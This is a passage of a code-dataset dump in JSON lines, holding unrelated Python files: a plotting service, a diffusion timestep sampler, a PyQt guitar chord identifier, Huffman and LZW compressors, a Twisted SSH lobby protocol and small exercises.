= \"inventory_plot.jpg\"\n\n return_val = cdms_products.inventory_plot(\n path=output_path,\n file_name=output_file_name,\n data=data,\n date_time=params.date_time,\n elements=params.elements,\n station=params.station,\n year=params.year,\n doy=params.doy,\n year_doy_plot=params.year_doy_plot,\n facet_by=params.facet_by,\n facet_x_size=params.facet_x_size,\n facet_y_size=params.facet_y_size,\n title=params.title,\n plot_title_size=params.plot_title_size,\n plot_title_hjust=params.plot_title_hjust,\n x_title=params.x_title,\n y_title=params.y_title,\n x_scale_from=params.x_scale_from,\n x_scale_to=params.x_scale_to,\n x_scale_by=params.x_scale_by,\n y_date_format=params.y_date_format,\n y_date_scale_by=params.y_date_scale_by,\n y_date_scale_step=params.y_date_scale_step,\n facet_scales=params.facet_scales,\n facet_dir=params.facet_dir,\n facet_x_margin=params.facet_x_margin,\n facet_y_margin=params.facet_y_margin,\n facet_nrow=params.facet_nrow,\n facet_ncol=params.facet_ncol,\n missing_colour=params.missing_colour,\n present_colour=params.present_colour,\n missing_label=params.missing_label,\n present_label=params.present_label,\n display_rain_days=params.display_rain_days,\n rain=params.rain,\n rain_cats=params.rain_cats,\n coord_flip=params.coord_flip,\n )\n\n return_path: str = os.path.join(output_path, output_file_name)\n return return_path\n","repo_name":"IDEMSInternational/opencdms-components-server-demo","sub_path":"app/services/inventory_plot.py","file_name":"inventory_plot.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4295092609","text":"from abc import ABC, abstractmethod\n\nimport numpy as np\nimport torch as th\nimport torch.distributed as dist\n\n\ndef create_named_schedule_sampler(name, diffusion):\n\n if name == \"uniform\":\n return UniformSampler(diffusion)\n elif name == \"loss-second-moment\":\n return LossSecondMomentResampler(diffusion) #\n else:\n raise NotImplementedError(f\"unknown schedule sampler: {name}\")\n\n\nclass ScheduleSampler(ABC):\n\n @abstractmethod\n def weights(self):\n \"\"\"\n Get a numpy array of weights, one per diffusion step.\n\n The weights needn't be normalized, but must be positive.\n \"\"\"\n\n def sample(self, batch_size, device):\n\n w = self.weights()\n p = w / np.sum(w)\n indices_np = np.random.choice(len(p), size=(batch_size,), 
p=p)\n indices = th.from_numpy(indices_np).long().to(device)\n weights_np = 1 / (len(p) * p[indices_np])\n weights = th.from_numpy(weights_np).float().to(device)\n return indices, weights\n\n\nclass UniformSampler(ScheduleSampler):\n def __init__(self, diffusion):\n self.diffusion = diffusion\n self._weights = np.ones([diffusion.num_timesteps])\n\n def weights(self):\n return self._weights\n\n\nclass LossAwareSampler(ScheduleSampler):\n def update_with_local_losses(self, local_ts, local_losses):\n\n batch_sizes = [\n th.tensor([0], dtype=th.int32, device=local_ts.device)\n for _ in range(dist.get_world_size())\n ]\n dist.all_gather(\n batch_sizes,\n th.tensor([len(local_ts)], dtype=th.int32, device=local_ts.device),\n )\n\n # Pad all_gather batches to be the maximum batch size.\n batch_sizes = [x.item() for x in batch_sizes]\n max_bs = max(batch_sizes)\n\n timestep_batches = [th.zeros(max_bs).to(local_ts) for bs in batch_sizes]\n loss_batches = [th.zeros(max_bs).to(local_losses) for bs in batch_sizes]\n dist.all_gather(timestep_batches, local_ts)\n dist.all_gather(loss_batches, local_losses)\n timesteps = [\n x.item() for y, bs in zip(timestep_batches, batch_sizes) for x in y[:bs]\n ]\n losses = [x.item() for y, bs in zip(loss_batches, batch_sizes) for x in y[:bs]]\n self.update_with_all_losses(timesteps, losses)\n\n @abstractmethod\n def update_with_all_losses(self, ts, losses):\n \"\"\"\n Update the reweighting using losses from a model.\n\n Sub-classes should override this method to update the reweighting\n using losses from the model.\n\n This method directly updates the reweighting without synchronizing\n between workers. It is called by update_with_local_losses from all\n ranks with identical arguments. Thus, it should have deterministic\n behavior to maintain state across workers.\n\n :param ts: a list of int timesteps.\n :param losses: a list of float losses, one per timestep.\n \"\"\"\n\nclass LossSecondMomentResampler(LossAwareSampler):\n def __init__(self, diffusion, history_per_term=10, uniform_prob=0.001):\n self.diffusion = diffusion\n self.history_per_term = history_per_term\n self.uniform_prob = uniform_prob\n self._loss_history = np.zeros(\n [diffusion.num_timesteps, history_per_term], dtype=np.float64\n )\n self._loss_counts = np.zeros([diffusion.num_timesteps], dtype=np.int)\n\n def weights(self):\n if not self._warmed_up():\n return np.ones([self.diffusion.num_timesteps], dtype=np.float64)\n weights = np.sqrt(np.mean(self._loss_history ** 2, axis=-1))\n weights /= np.sum(weights)\n weights *= 1 - self.uniform_prob\n weights += self.uniform_prob / len(weights)\n return weights\n\n def update_with_all_losses(self, ts, losses):\n for t, loss in zip(ts, losses):\n if self._loss_counts[t] == self.history_per_term:\n # Shift out the oldest loss term.\n self._loss_history[t, :-1] = self._loss_history[t, 1:]\n self._loss_history[t, -1] = loss\n else:\n self._loss_history[t, self._loss_counts[t]] = loss\n self._loss_counts[t] += 1\n\n def _warmed_up(self):\n return (self._loss_counts == self.history_per_term).all()\n","repo_name":"Hxyz-123/Font-diff","sub_path":"utils/resample.py","file_name":"resample.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"76"} +{"seq_id":"43892594841","text":"import sqlite3\nimport Initialize\n\n\ndef main():\n conn = sqlite3.connect('main_database.db')\n c = conn.cursor()\n Initialize.init(conn)\n\n print(\"print rows\")\n get_launch_paths(c)\n\n 
update_path(conn, 'Steam', \"C:\\\\Program Files (x86)\\Steam\\\\steamapps\\\\common\")\n update_path(conn, 'Origin', \"C:\\\\Program Files(x86)\\\\Origin Games\")\n get_launch_paths(c)\n conn.close()\n\n\ndef update_path(conn, name, path):\n c = conn.cursor()\n sql = ''' UPDATE launchPaths\n SET path = ? \n WHERE name = ?'''\n c.execute(sql, (path, name))\n conn.commit()\n\n\ndef get_launch_paths(cursor):\n for row in cursor.execute('SELECT * FROM launchPaths'):\n print(row)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"TimKelleher81/GamesLauncher","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32568523356","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom pychord import find_chords_from_notes\nfrom pychord.analyzer import notes_to_positions\nimport Fretboard_ui\nfrom const import *\n\nclass ThreeNotes(Fretboard_ui.Fretboard_ui): # Inherit from Fretboard_ui.py\n def __init__(self, MainWindow):\n super().__init__(MainWindow)\n # Get objects define in Fretboard_ui.py\n ## The notes now playing\n self.component_notes = {stringNum: val['noteName'] for stringNum, val in OPEN_STRING_NOTE.items()}\n ## The strings now muted\n self.string_muted = {i:False for i in range(1, STRING_NUM + 1)}\n self.Horizon_lines = [vars(self)[f'line_{i}'] for i in range(HORIZON_LINES_INDEX_START, HORIZON_LINES_INDEX_END + 1)]\n self.Vertical_lines = [vars(self)[f'line_{i}'] for i in range(VERTICAL_LINES_INDEX_START, VERTICAL_LINES_INDEX_END + 1)]\n self.points = [vars(self)[f'label_{i}'] for i in range(POINTS_INDEX_START, POINTS_INDEX_END + 1)]\n self.initLinkLinesAndPoints(self.Horizon_lines, self.points)\n self.strings = self.initString(self.Horizon_lines)\n self.textBrowsers = [vars(self)[f'textBrowser_{i}'] for i in range(1, STRING_NUM + 1)]\n self.checkBoxs = [vars(self)[f'checkBox_{i}'] for i in range(1, STRING_NUM + 1)]\n\n # Mode\n self.mode = Mode.CHORD\n self.initNoteMode()\n\n # init UI\n self.initAllNoteName()\n # QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n ## reset button / mode button event\n self.resetButton.clicked.connect(self.resetEvent)\n self.modeButton.clicked.connect(self.modeChangeEvent)\n ## mute check box event\n for i in range(STRING_NUM):\n self.checkBoxs[i].stateChanged.connect(self.selectCheckBoxEvent(stringNum = i + 1))\n\n ######################## Init ########################\n\n def initLinkLinesAndPoints(self, lines: list, points: list):\n '''\n Link lines and points, and init the press event.\n '''\n for line, point in zip(lines, points):\n point.mousePressEvent = self.pointPressEvent(point)\n point.press = False\n point.hide()\n\n line.point = point\n line.mousePressEvent = self.linePressEvent(line)\n\n def initString(self, lines: list):\n '''\n Pack every twelve continuously adjacent horizon lines into a string.\n '''\n class String(list):\n def __init__(self):\n super().__init__()\n self.pressedPoint = None\n strings = []\n for string_idx in range(STRING_NUM):\n strings.append(String())\n for note_idx in range(NOTE_PER_STRING):\n idx = string_idx * NOTE_PER_STRING + note_idx\n line = lines[idx]\n line.point.stringNum = string_idx + 1\n strings[-1].append(line)\n return strings\n\n def initNoteMode(self):\n '''\n Init note Mode.\n '''\n self.notes = {note : list() for note in NOTES}\n self.noteModePressedPoints = list()\n for point in self.points:\n self.notes[point.noteName].append(point)\n\n def 
initAllNoteName(self):\n '''\n Set the initial note name of each string.\n '''\n for string_idx in range(1, STRING_NUM+1):\n noteName = OPEN_STRING_NOTE[string_idx]['noteName']\n pitchNum = OPEN_STRING_NOTE[string_idx]['pitchNum']\n self.setNoteName(string_idx, noteName, pitchNum)\n\n ######################## Utility ########################\n\n def pointPress(self, point):\n '''\n The helper function for pressing on fret.\n '''\n stringNum = point.stringNum\n string = self.strings[stringNum - 1]\n if not point.press:\n if string.pressedPoint and self.mode == Mode.CHORD:\n string.pressedPoint.hide()\n string.pressedPoint.press = False\n string.pressedPoint = point\n point.show()\n point.press = True\n noteName, pitchNum = point.noteName, point.pitchNum\n else:\n point.hide()\n point.press = False\n string.pressedPoint = None\n noteName = OPEN_STRING_NOTE[stringNum]['noteName']\n pitchNum = OPEN_STRING_NOTE[stringNum]['pitchNum']\n self.component_notes[stringNum] = noteName\n self.setNoteName(stringNum, noteName, pitchNum)\n self.checkChord()\n\n def checkChord(self):\n '''\n Check the notes now playing from string six to string one, \n sort by the distance to root note, and identify the chord by pychord.\n '''\n if self.mode == Mode.NOTE: # Note Mode don't need to show chord\n return\n def getNotesPosition(component_notes: list, root_note):\n notes_position = notes_to_positions(component_notes, root_note)\n for idx in range(len(notes_position)):\n notes_position[idx] %= len(NOTES) # 12 half steps a cycle\n return notes_position\n\n root_note = None\n component_notes = set() # pychord cannot accept duplicate notes\n for idx in range(STRING_NUM, 0, -1): # Order from string six to one to find root note\n if self.string_muted[idx]:\n continue\n if root_note == None:\n root_note = self.component_notes[idx]\n component_notes.add(self.component_notes[idx])\n component_notes = list(component_notes)\n notes_position = getNotesPosition(component_notes, root_note)\n\n _, component_notes = zip(*sorted(zip(notes_position, component_notes)))\n chord = find_chords_from_notes(component_notes)\n chordName = chord[0].chord if chord else ''\n self.setChordText(chordName)\n print(component_notes)\n print(chordName)\n \n def setChordText(self, chordName):\n '''\n Set the text in text browser by chord name.\n '''\n self.textBrowser_chord_identifier.setHtml(\"\\n\"\n \"\\n\"\n \"

    \"\n f\"{chordName}

    \")\n\n def setNoteName(self, stringNum, noteName, pitchNum):\n '''\n Set the note of string \"stringNum\" by noteName and pitchNum.\n '''\n if self.mode == Mode.NOTE: # Note Mode don't need to show pressed note name of the string\n return\n assert(0 < len(noteName) and len(noteName) < 3)\n s = f'{noteName[0]}'\n if len(noteName) == 2:\n s += f'{noteName[1]}'\n s += f'{pitchNum}'\n self.textBrowsers[stringNum-1].setHtml(\"\\n\"\n \"\\n\"\n \"

    \"\n f\"{s}

    \")\n\n ######################## Event Handler ########################\n\n def pointPressEventHelper(self, point):\n '''\n Press the different points by mode.\n\n Chord mode: Press the single point.\n Note mode: Press all the same notes, even in different pitch.\n '''\n if self.mode == Mode.CHORD:\n self.pointPress(point)\n elif self.mode == Mode.NOTE:\n self.resetEvent()\n same_note_points = self.notes[point.noteName]\n self.noteModePressedPoints = same_note_points\n for same_note_point in same_note_points:\n self.pointPress(same_note_point)\n\n def linePressEvent(self, line):\n '''\n Press on the line.\n '''\n def linePressEventWrapper(e):\n point = line.point\n self.pointPressEventHelper(point)\n return linePressEventWrapper\n\n def pointPressEvent(self, point):\n '''\n Press on the showed point.\n '''\n def pointPressEventWrapper(e):\n self.pointPressEventHelper(point)\n return pointPressEventWrapper\n\n def resetEvent(self):\n '''\n Reset to original state.\n '''\n self.component_notes = {stringNum: val['noteName'] for stringNum, val in OPEN_STRING_NOTE.items()}\n if self.mode == Mode.CHORD:\n for string in self.strings:\n if string.pressedPoint != None:\n point = string.pressedPoint\n self.pointPress(point)\n elif self.mode == Mode.NOTE:\n for point in self.noteModePressedPoints:\n self.pointPress(point)\n self.noteModePressedPoints = list()\n for idx in range(STRING_NUM):\n if self.string_muted[idx + 1]:\n self.checkBoxs[idx].click()\n self.checkChord()\n\n def modeChangeEvent(self):\n '''\n Change between Chord Mode and Note Mode.\n '''\n self.resetEvent()\n if self.mode == Mode.CHORD:\n self.mode = Mode.NOTE\n elif self.mode == Mode.NOTE:\n self.mode = Mode.CHORD\n self.modeButton.setText(self.mode.value)\n\n def selectCheckBoxEvent(self, stringNum):\n '''\n Mute specific string.\n '''\n def selectCheckBoxEventWrapper():\n self.string_muted[stringNum] = not self.string_muted[stringNum]\n self.checkChord()\n return selectCheckBoxEventWrapper\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = ThreeNotes(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"howardgood88/ThreeNotes","sub_path":"ThreeNotes.py","file_name":"ThreeNotes.py","file_ext":"py","file_size_in_byte":10551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"86451562362","text":"class Solution:\n def insert(self, head: 'Optional[Node]', insertVal: int) -> 'Node':\n if head == None:\n node = Node(insertVal)\n node.next = node\n return node\n\n ptr = head\n while ptr.next != head:\n if ptr.val <= ptr.next.val:\n if ptr.val <= insertVal <= ptr.next.val:\n break\n else:\n if insertVal <= ptr.next.val or insertVal >= ptr.val:\n break\n\n ptr = ptr.next\n\n node = Node(insertVal, ptr.next)\n ptr.next = node\n\n return head\n","repo_name":"kama1kant/coding-practice","sub_path":"leetcode/708_insert_into_a_sorted_circular_linked_list.py","file_name":"708_insert_into_a_sorted_circular_linked_list.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35374545606","text":"import io\n\n\"\"\"\n--Start huffman method--\n\"\"\"\n\n\nclass QueueNodes:\n nodes = []\n\n def addNode(self, element):\n \"\"\"\n Add node object to list\n :param element: node object to insert\n \"\"\"\n i = 0\n while i < len(self.nodes) and self.nodes[i].weight < element.weight:\n i += 1\n 
self.nodes.insert(i, element)\n\n def removeNode(self, index):\n \"\"\"\n Remove node object from list by index\n :param index: Integer index >=0\n \"\"\"\n del self.nodes[index]\n\n def getNode(self, index):\n \"\"\"\n Get node object by index\n :param index: Integer index >=0\n \"\"\"\n return self.nodes[index]\n\n def size(self):\n \"\"\"\n :return: size of list node objects\n \"\"\"\n return len(self.nodes)\n\n def __str__(self):\n \"\"\"\n String represent\n \"\"\"\n return \"[\" + ','.join(map(str, self.nodes)) + \"]\"\n\n\nclass Node:\n leftSon = None\n rightSon = None\n weight = 0\n character = ''\n binaryCode = ''\n\n def __init__(self, leftSon = None, rightSon = None, weight = 0, character = '', binaryCode = ''):\n \"\"\"\n\n :param leftSon: link to left node object\n :param rightSon: link to right node object\n :param weight: frequency of occurrence character\n :param character: char value\n :param binaryCode: string value\n \"\"\"\n self.leftSon = leftSon\n self.rightSon = rightSon\n if leftSon is not None and rightSon is not None:\n self.weight = leftSon.weight + rightSon.weight\n else:\n self.weight = weight\n self.character = character\n self.binaryCode = binaryCode\n return\n\n def isSheet(self):\n \"\"\"\n Checks whether the object is a sheet\n :return: bool\n \"\"\"\n return True if self.leftSon is None and self.rightSon is None else False\n\n def __str__(self):\n \"\"\"\n String represent\n \"\"\"\n return '(weight = {}, character = \\'{}\\', leftSon = {}, rightSon = {}, binaryCode = {})'.format(self.weight,\n self.character,\n self.leftSon,\n self.rightSon,\n self.binaryCode)\n\n\nclass DecodeTree:\n \"\"\"\n Decoded tree sample format\n\n {\n 'A' : '001',\n 'B' : '010'\n }\n \"\"\"\n decodedTree = {}\n usedNodes = {}\n\n model = ''\n\n position = 0\n\n def __init__(self, model):\n \"\"\"\n :param model: encoded binary tree string\n \"\"\"\n self.model = model\n\n def decodeTree(self, currentCode = ''):\n \"\"\"\n Decode character by binary codes\n :param currentCode: string binary codee\n \"\"\"\n if len(self.model) <= self.position:\n return\n\n character = self.model[self.position]\n\n if currentCode in self.usedNodes and self.usedNodes[currentCode] == 2:\n return\n\n if character is not '0':\n self.position += 1\n character = self.model[self.position]\n if currentCode is '':\n currentCode = '0'\n self.decodedTree[currentCode] = character\n self.usedNodes[currentCode] = 2\n\n while currentCode in self.usedNodes and self.usedNodes[currentCode] == 2 and len(currentCode) > 0:\n currentCode = currentCode[:-1]\n\n self.position += 1\n self.decodeTree(currentCode + '1')\n return\n self.position += 1\n\n self.decodeTree(currentCode + '0')\n self.usedNodes[currentCode] = 1\n\n self.decodeTree(currentCode + '1')\n self.usedNodes[currentCode] = 2\n\n\nclass EncodeTree:\n nodes = QueueNodes()\n\n sheets = {}\n\n model = ''\n\n def merge(self):\n \"\"\"\n Merge two first nodes with minimum weight\n \"\"\"\n leftSon = self.nodes.getNode(0)\n rightSon = self.nodes.getNode(1)\n self.nodes.removeNode(0)\n self.nodes.removeNode(0)\n self.nodes.addNode(Node(leftSon, rightSon))\n\n def addNode(self, node):\n \"\"\"\n :param node: node object to insert\n \"\"\"\n self.nodes.addNode(node)\n\n def buildTree(self, statisticDictionary):\n \"\"\"\n Create binary tree from dictionary with frequency of occurrence statistic\n\n :param statisticDictionary: dictionary where key is text's character and value is frequency of occurrence\n :return:\n \"\"\"\n for character, weight in 
statisticDictionary.items():\n self.addNode(Node(weight = weight, character = character))\n while self.nodes.size() > 1:\n self.merge()\n self.defineSheetsBinaryCode('', self.getRootNode())\n self.buildTreeEncodedModel(self.getRootNode())\n\n def getRootNode(self):\n \"\"\"\n :return: root node object\n \"\"\"\n return self.nodes.getNode(0)\n\n def defineSheetsBinaryCode(self, currentCode, node):\n \"\"\"\n Give binary code each node\n :param currentCode: string\n :param node: node object\n \"\"\"\n if node.isSheet():\n node.binaryCode = currentCode if currentCode is not '' else '0'\n self.sheets[node.character] = node.binaryCode\n return\n self.defineSheetsBinaryCode(currentCode + '0', node.leftSon)\n self.defineSheetsBinaryCode(currentCode + '1', node.rightSon)\n\n def buildTreeEncodedModel(self, node):\n \"\"\"\n Encode binary tree to string\n\n :param node: root node object\n \"\"\"\n if node.isSheet():\n self.model += \"1\" + node.character\n return\n else:\n self.model += \"0\"\n self.buildTreeEncodedModel(node.leftSon)\n self.buildTreeEncodedModel(node.rightSon)\n\n def __str__(self):\n \"\"\"\n String represent\n \"\"\"\n return str(self.nodes)\n\n\nclass FileWork:\n\n @staticmethod\n def getFileContent(fileName, encoding = \"UTF-8\"):\n \"\"\"\n Return string with file content\n\n :param encoding: file encoding\n :param fileName: string path to file\n :return: string file content\n \"\"\"\n file = io.open(fileName, mode = \"r\", encoding = encoding)\n text = file.read()\n file.close()\n return text\n\n @staticmethod\n def writeToFile(fileName, content, encoding = \"UTF-8\"):\n \"\"\"\n Write content to file\n\n :param content: file text content\n :param encoding: file encoding\n :param fileName: string path to file\n :return: string file content\n \"\"\"\n file = io.open(fileName, mode = \"w\", encoding = encoding)\n file.write(content)\n file.close()\n\n\nclass Statistic:\n statisticDictionary = {}\n\n def getStatisticFromFile(self, fileName):\n \"\"\"\n :param fileName: string file path\n :return: dictionary with frequency occurred statistic\n \"\"\"\n text = FileWork.getFileContent(fileName)\n for character in text:\n self.statisticDictionary[character] = (lambda character: self.statisticDictionary[\n character] if character in self.statisticDictionary else 0)(character) + 1\n return self.statisticDictionary\n\n\nclass HuffmanAlgorithm:\n\n @staticmethod\n def encodeHuffman(fileIn, fileOut, encoding = \"UTF-8\"):\n \"\"\"\n\n :param encoding: file encoding\n :param fileIn: string file path\n :param fileOut: string file path\n \"\"\"\n\n try:\n frequencyOccurredStatistic = Statistic()\n frequencyOccurredStatistic = frequencyOccurredStatistic.getStatisticFromFile(fileIn)\n\n tree = EncodeTree()\n tree.buildTree(frequencyOccurredStatistic)\n\n treeSheets = tree.sheets\n\n text = FileWork.getFileContent(fileIn, encoding)\n\n encodeResult = \"\"\n for character in text:\n encodeResult += treeSheets[character]\n\n separator = ' '\n\n encodeResult += separator + tree.model\n\n file = io.open(fileOut, mode = \"w\", encoding = encoding)\n file.write(encodeResult)\n file.close()\n return True\n except Exception:\n return False\n\n @staticmethod\n def decodeHuffman(fileIn, fileOut, encoding = \"UTF-8\"):\n \"\"\"\n\n :param encoding: file encoding\n :param fileIn: string file path\n :param fileOut: string file path\n \"\"\"\n try:\n file = io.open(fileIn, mode = \"r\", encoding = encoding)\n fileContent = file.read()\n fileContent = fileContent.split(' ', 1)\n\n treeModel = 
fileContent[1]\n text = fileContent[0]\n\n tree = DecodeTree(treeModel)\n tree.decodeTree()\n\n charactersBinaryCodes = tree.decodedTree\n\n currentCharacterCode = \"\"\n result = \"\"\n for character in text:\n currentCharacterCode += character\n if currentCharacterCode in charactersBinaryCodes:\n result += charactersBinaryCodes[currentCharacterCode]\n currentCharacterCode = \"\"\n\n file = io.open(fileOut, mode = \"w\", encoding = encoding)\n file.write(result)\n file.close()\n return True\n except Exception:\n return False\n\n\nif HuffmanAlgorithm.encodeHuffman(\"huffmanBest.txt\", \"huffmanEncodedBest.txt\"):\n print(\"All done. Huffman encoded\")\nelse:\n print(\"Huffman encoding error\")\n\nif HuffmanAlgorithm.decodeHuffman(\"huffmanEncodedBest.txt\", \"huffmanDecoded.txt\"):\n print(\"All done. Huffman decoded\")\nelse:\n print(\"Huffman decoding error\")\n\n\"\"\"\n--End huffman method--\n\"\"\"\n\n\"\"\"\n--Start LZW--\n\"\"\"\n\n\nclass LZWAlgorithm:\n\n @staticmethod\n def encodeLZ(fileIn, fileOut, dictionarySize = 1114112):\n \"\"\"\n Encode file content string to file\n\n :param fileIn: string path to file\n :param fileOut: string path to file\n :param dictionarySize: max UTF-8 char value\n \"\"\"\n try:\n fileContent = FileWork.getFileContent(fileIn)\n\n dictionary = {}\n for i in range(0, dictionarySize):\n dictionary[chr(i)] = i\n\n currentCode = dictionarySize\n\n encodedFileContent = \"\"\n buffer = fileContent[0]\n for pos in range(1, len(fileContent)):\n character = fileContent[pos]\n if (buffer + character) in dictionary:\n buffer += character\n else:\n dictionary[buffer + character] = currentCode\n currentCode += 1\n encodedFileContent += str(dictionary[buffer]) + \" \"\n buffer = character\n\n encodedFileContent += str(dictionary[buffer])\n\n FileWork.writeToFile(fileOut, encodedFileContent)\n return True\n except Exception:\n return False\n\n @staticmethod\n def decodeLZ(fileIn, fileOut, dictionarySize = 1114112):\n \"\"\"\n Decode file content from file\n\n :param fileIn: string path to file\n :param fileOut: string path to file\n :param dictionarySize: max UTF-8 char value\n \"\"\"\n try:\n fileContent = FileWork.getFileContent(fileIn)\n\n getCharByCode = {}\n getCodeByChar = {}\n\n for i in range(0, dictionarySize):\n getCharByCode[i] = chr(i)\n getCodeByChar[chr(i)] = i\n\n currentCode = dictionarySize\n\n fileContent = fileContent.split(' ')\n buffer = getCharByCode[int(fileContent[0])]\n decodeFileContent = \"\"\n for i in range(1, len(fileContent)):\n character = \"\"\n if int(fileContent[i]) in getCharByCode:\n character = getCharByCode[int(fileContent[i])]\n else:\n getCharByCode[currentCode] = buffer + buffer[0]\n getCodeByChar[buffer + buffer[0]] = currentCode\n currentCode += 1\n decodeFileContent += buffer\n character = buffer[0]\n\n if (buffer + character[0]) in getCodeByChar:\n buffer = buffer + character[0]\n else:\n getCharByCode[currentCode] = buffer + character[0]\n getCodeByChar[buffer + character[0]] = currentCode\n currentCode += 1\n decodeFileContent += buffer\n buffer = character\n decodeFileContent += buffer\n FileWork.writeToFile(fileOut, decodeFileContent)\n return True\n except Exception:\n return False\n\n\nif LZWAlgorithm.encodeLZ(\"LZWBest.txt\", \"LZWEncodedBest.txt\"):\n print(\"All done. LZW encoded\")\nelse:\n print(\"LZW encoding error\")\n\nif LZWAlgorithm.decodeLZ(\"LZWEncodedBest.txt\", \"LZWDecoded.txt\"):\n print(\"All done. 
LZW decoded\")\nelse:\n print(\"LZW decoding error\")\n\"\"\"\n--End LZW--\n\"\"\"\n\n","repo_name":"vovaksenov99/LZW-Huffman","sub_path":"LZW and Huffman.py","file_name":"LZW and Huffman.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40964075088","text":"list_of_strings = input().split(\", \")\ncount_of_beggars = int(input())\nfinal_list = []\ncounter_of_index = 0\nlist_of_digits = []\n\nfor element in list_of_strings:\n list_of_digits.append(int(element))\nwhile counter_of_index < count_of_beggars:\n sum_of_current_beggar = 0\n for current_index in range(counter_of_index, len(list_of_digits), count_of_beggars):\n sum_of_current_beggar += list_of_digits[current_index]\n counter_of_index += 1\n final_list.append(sum_of_current_beggar)\nprint(final_list)\n","repo_name":"Sindragossa/SoftUni","sub_path":"Programming_Fundamentals_with_Python/Lists_Basics_Exercise/number_beggars.py","file_name":"number_beggars.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3204440255","text":"import sys\n\nn = 6\nedge = [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]\n\ndef solution(n, edge):\n \n graph = [[] for _ in range(n+1)]\n dist = [0 for _ in range(n+1)]\n visited= [0 for _ in range(n+1)]\n\n for ed in edge:\n graph[ed[0]].append(ed[1])\n graph[ed[1]].append(ed[0])\n\n queue =[[1,0]]\n\n while queue:\n vertex,depth = queue.pop(0)\n\n if visited[vertex] == 0:\n dist[vertex] = depth\n visited[vertex] = 1\n for node in graph[vertex]:\n if visited[node] == 0:\n queue.append([node,depth+1])\n \n answer = dist.count(max(dist))\n return answer\n\nprint(solution(n, edge))\n\n","repo_name":"chosaihim/jungle_codingTest_study","sub_path":"JAN/25th/sh_가장먼노드.py","file_name":"sh_가장먼노드.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"457517094","text":"from google.appengine.ext import ndb\n\n\nclass Event(ndb.Model):\n tag = ndb.StringProperty()\n done = ndb.BooleanProperty()\n created = ndb.DateTimeProperty(auto_now_add=True)\n updated = ndb.DateTimeProperty(auto_now=True)\n\n @classmethod\n def create_or_update(cls, calendar_key, _id, tag, done=False):\n if not _id:\n raise ValueError('Invalid id for Event object.')\n\n event = cls.get_or_insert(_id, parent=calendar_key,\n tag=tag,\n done=done)\n if event.tag != tag or event.done != done:\n event.tag = tag\n event.done = done\n event.put()\n\n return event\n\n @classmethod\n def get_all(cls, calendar_key):\n return cls.query(ancestor=calendar_key)\n","repo_name":"slackpad/hashtagtodo","sub_path":"todo/models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"25056181877","text":"\nfrom __future__ import (\n absolute_import,\n print_function,\n)\nimport weakref\nfrom txsshsvr import (\n lobby,\n users,\n)\nfrom twisted.conch.recvline import HistoricRecvLine\nfrom twisted.conch.insults.insults import TerminalProtocol\nfrom twisted.python import log\nfrom textwrap import dedent\n\ndef makeSSHApplicationProtocol(reactor, user_id):\n proto = SSHApplicationProtocol()\n proto.reactor = reactor\n proto.user_id = user_id\n return proto\n\n\nclass SSHApplicationProtocol(TerminalProtocol):\n CTRL_D = '\\x04'\n reactor 
= None\n user_id = None\n\n def connectionMade(self):\n TerminalProtocol.connectionMade(self)\n self._init_app_protocol()\n\n def keystrokeReceived(self, keyID, modifier):\n if keyID == self.CTRL_D:\n self.terminal.loseConnection()\n elif keyID == 'R':\n self.app_protocol.update_display()\n else:\n self.app_protocol.handle_input(keyID, modifier)\n\n def terminalSize(self, width, height):\n log.msg(\"width: {}, height: {}\".format(width, height))\n\n def unhandledControlSequence(self, seq):\n log.msg(\"unhandled control seq.\")\n\n def _init_app_protocol(self):\n \"\"\"\n Initialize the application protocol.\n \"\"\"\n user_id = self.user_id\n entry = users.get_user_entry(user_id)\n need_init = False\n if entry.app_protocol is None:\n app_protocol = lobby.SSHLobbyProtocol()\n entry.app_protocol = app_protocol\n need_init = True\n app_protocol = entry.app_protocol\n app_protocol.reactor = self.reactor\n app_protocol.terminal = self.terminal\n app_protocol.user_id = self.user_id\n self.app_protocol = app_protocol\n app_protocol.parent = weakref.ref(self)\n if need_init:\n app_protocol.initialize()\n else:\n self.terminal.reset()\n app_protocol.update_display()\n\n def connectionLost(self, reason):\n pass\n\n","repo_name":"cwaldbieser/txsshlobby","sub_path":"txsshsvr/app_proto.py","file_name":"app_proto.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28259081352","text":"# Пока работает только с одной скобкой в выражении\n# Должен работать с любыми варианами +, -, *, / и в любом месте ()\n# надо вынести проверку на ( ) и расчет внутри ( ) в отдельную функцию, а результат записывать вместо скобки в тело списка m[]\n# после вновь проверять m[] на ( ) \n\n\n#________переменные_________________________\n\n# укажите выражение (после символа пробел обязателен!)\n#n = '12 + 15'\n#n = '12 + 15 - 4'\n#n = '12 - 4 * 2 + 6 / 3'\nn = '( 12 - 4 ) * 2' \n\nm = n.split()\nm2 = [] # применяется в вычислении * и / 